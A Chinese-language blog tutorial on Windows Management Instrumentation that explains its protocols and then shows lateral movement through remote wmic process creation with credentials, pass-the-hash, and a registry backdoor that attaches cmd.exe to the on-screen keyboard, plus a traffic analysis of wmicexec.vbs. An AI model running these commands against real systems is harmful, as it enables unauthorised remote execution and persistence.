了解WMI

了解WMI什么叫WMI?Windows管理规范(WMI)是Windows管理功能,它为本地和远程访问Windows系统组件提供了统一的环境。它依赖于WMI服务进行本地和远程访问,并依赖于服务器消息块(SMB)和远程过程调用服务(RPCS)进行远程访问。RPCS通过端口135运行。wmi的类和命名空间怎么理

大家好,欢迎来到IT知识分享网。

什么叫WMI?

Windows管理规范(WMI)是Windows管理功能,它为本地和远程访问Windows系统组件提供了统一的环境。
它依赖于WMI服务进行本地和远程访问,并依赖于服务器消息块(SMB)和远程过程调用服务(RPCS)进行远程访问。
RPCS通过端口135运行。

wmi的类和命名空间怎么理解?

操作系统信息是通过WMI对象的方式表示的。一个WMI对象也就是一个WMI类的实例。
大多数常用的WMI类在MSDN中都有详细的描述,如Win32_Process类。然而还有很多WMI类并没有文档可查,
但是幸运的是,我们可以通过WQL来查询所有的WMI类。 与传统的面向对象编程语言相似,WMI类被分类分层的放在命名空间中。所有的命名空间都是从ROOT命名空间下的,
当不指定命名空间进行查询时,Microsoft会使用ROOT\CIMV2作为默认的命名空间。 所有的WMI设置,包括默认命名空间在下面的注册表键中: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM

 wmi强大在哪里?相比psexec

WMI的强大体现在通过远程操作的时候。目前,WMI支持两种协议:DCOM和WinRM,使用这两种协议可以做任何事情,包括查询对象,注册事件和执行WMI类的方法,等等。

两种协议都对攻击者有利,因为防御者通常不会检查这两种协议的恶意流量。利用WMI所需的东西就是可用的有权限的用户凭证。在Linux平台上的wmis-pth工具中,只需要提供被攻击者的用户哈希即可。

DCOM (Distributed Component Object Model)
从WMI被引入的时候起,DCOM就被当作默认协议。DCOM通过135端口建立TCP连接,后续的数据交换则通过随机选择的TCP端口传输。这个端口可以通过dcomcnfg.exe进行配置和修改,其最终是改动如下注册表项:

HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Internet - Ports (REG_MULTI_SZ)

所有的PowerShell中内置的WMI命令都使用DCOM协议。

PS C:\Users\Michael\Desktop> Get-WmiObject -Class Win32_Process -ComputerName WIN-Q4UUJ0BPKL9 -Credential 'WIN-Q4UUJ0BPKL9\Administrator'
WinRM (Windows Remote Management)
近来,WinRM已经超过了DCOM,被Windows当作建议使用的协议。WinRM基于Web Services-Management (WSMan)规范,是一个SOAP-based设备管理协议。另外,PowerShell Remoting也是基于WinRM规范的,这使得我们能够通过PowerShell在大规模Windows企业环境中实现强大的远程管理功能。WinRM同样支持WMI,或者说CIM的网络操作。

默认情况下,WinRM服务开启并监听5985/tcp端口,而且默认是加密的。还可以通过配置证书的方式在5986/tcp端口实现HTTPS支持。

我们是如何通过wmi横向的呐?,又是如何获取输出的结果的

wmi横向执行命令

C:\Users\Administrator\Desktop\PSTools>wmic /node:192.168.1.101 /user:administra
tor /password:123456 process call create "cmd.exe /c calc.exe"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 2732;
        ReturnValue = 0;
};

 了解WMI

wmi修改注册表添加后门

wmic /authority:”kerberos:Domain\user” /node:SQL01 process call create ‘reg.exe add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe” /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe”’

 我们通过wireshark的流量包不难分析出wmic执行命令的过程

1进行NTML认证
2由于没有指定命名空间所以使用ROOT\CIMV2作为默认的命名空间。
3调用Win32_Process类中静态方法Create创建进程

了解WMI

 

 但是这样的结果是不能被我们看见的

github上面有一款有回显的wmicexec.vbs

我们继续查看流量看他是如何获取回显的

https://github.com/Twi1ight/AD-Pentest-Script

 第一步建立ipc$

了解WMI

 

 然后新建了一个共享叫

了解WMI

 

然后新建一个叫wmi.dll的文件在此共享目录下面

了解WMI

 

从这里的数据分析不难看出创建的服务是我们要执行的命令输出到wmi.dll

 了解WMI

 

 

读取完成后再删除wmi.dll

了解WMI

 

 此过程完全流量透明很容易被ids侦察出来。(后续会思考如何加密流量)

参考

https://www.cnblogs.com/-qing-/p/11374136.html
https://m0nst3r.me/pentest/%E5%88%A9%E7%94%A8WMI%E6%9E%84%E5%BB%BA%E4%B8%80%E4%B8%AA%E6%8C%81%E4%B9%85%E5%8C%96%E7%9A%84%E5%BC%82%E6%AD%A5%E7%9A%84%E6%97%A0%E6%96%87%E4%BB%B6%E5%90%8E%E9%97%A8.html
https://sapsan.eth.link/hacktricks/windows/ntlm/wmicexec/
https://dmcxblue.gitbook.io/red-team-notes/execution/windows-management-instrumentation-wmi

 

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://yundeesoft.com/31902.html

(0)

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

关注微信